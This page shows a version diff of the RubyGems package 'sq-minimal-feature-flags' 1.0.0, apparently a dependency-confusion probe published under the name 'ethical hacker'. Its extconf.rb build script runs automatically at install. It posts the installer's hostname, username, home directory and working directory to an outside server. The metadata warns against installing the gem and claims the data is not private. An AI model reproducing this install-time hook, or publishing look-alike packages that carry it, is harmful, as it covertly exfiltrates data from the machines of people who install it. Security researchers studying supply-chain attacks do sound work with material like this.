RubyGems - sq-minimal-feature-flags - Versions diffs - 1.0.0 - Mend

sq-minimal-feature-flags 1.0.0

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: ca5a943965804e244a22efc2469e3f274f8917b29b7f44b06ad4bda3c43922fb
+  data.tar.gz: de77eb366884ae2d45cdccd8d99900572cb3d09cf6f6ecadff4287a28553b4d2
+SHA512:
+  metadata.gz: 490705d1b615695cf715ad045cf82834b5ff52ca9ca4f18197d004f37792898c20c030f43612d348dafdfcbda9471d8562d468416f222c4a3fa8af50bba72632
+  data.tar.gz: 241604badfc472f48abee5bcaded993e3fb0344983d7e191d7a2c34ca18d93426e439a3b2624921fe34bf55ba941548b0596c122ebf59a4a2903c66c7a4a9bcd

data/ext/hola/extconf.rb ADDED Viewed

@@ -0,0 +1,14 @@
+require 'uri'
+require 'net/http'
+require 'socket'
+# Extract only the bare minimum to be able to identify
+# vulnerable organization.
+# Send hostname, username, current working directory, home directory to my server.
+# There isn't anything malicious in here! This information is not private/confidential in any way.
+uri = URI('http://ruby-dependency-confusion.jumpingcrab.com/report')
+res = Net::HTTP.post_form(uri, 'gem' => 'sq-minimal-feature-flags', 'version' => '1.0.0', 'hostname' => Socket.gethostname, 'username' => ENV['USER'] || 'no_user', 'home' => File.expand_path('~'), 'cwd' => Dir.pwd)

metadata ADDED Viewed

@@ -0,0 +1,49 @@
+--- !ruby/object:Gem::Specification
+name: sq-minimal-feature-flags
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+platform: ruby
+authors:
+- ethical hacker
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2023-03-13 00:00:00.000000000 Z
+dependencies: []
+description: |-
+  WARNING! DO NOT INSTALL THIS GEM.
+  This gem is used to detect dependency confusion vulnerabilities. When installed, the gem sends hostname, username, home directory and current working directory to my server so I can identifiy vulnerable companies. The gem does not do anything else. The extracted information is not private/confidential in any way.
+email:
+executables: []
+extensions:
+- ext/hola/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/hola/extconf.rb
+homepage:
+licenses: []
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: WARNING! DO NOT INSTALL THIS GEM. This gem is used to detect dependency confusion
+  vulnerabilities. When installed, the gem sends hostname, username, home directory
+  and current working directory to my server so I can identifiy vulnerable companies.
+  The gem does not do anything else. The extracted information is not private/confidential
+  in any way.
+test_files: []